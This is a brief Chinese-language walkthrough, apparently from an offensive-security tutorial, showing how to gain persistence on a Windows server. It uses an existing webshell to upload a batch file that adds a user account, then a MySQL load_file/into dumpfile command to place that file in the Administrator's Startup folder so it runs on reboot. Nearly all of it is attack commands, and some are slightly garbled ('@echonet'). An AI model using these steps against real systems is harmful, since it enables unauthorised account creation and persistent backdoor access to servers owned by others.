第一步:利用webshell上传我们写好的bat文件
@echonet user ceshi 123!@#ws /add
第二步,使用sql命令将上传的ba文件写到启动项中。
select load_file(‘C:/phpStudy/PHPTutorial/WWW/adduser.bat’) into dumpfile ‘C:/Documents and Settings/Administrator/「开始」菜单/程序/启动/adduser.bat’;第三步,让目标服务器重启后,查看发现用户被创建,bat文件执行。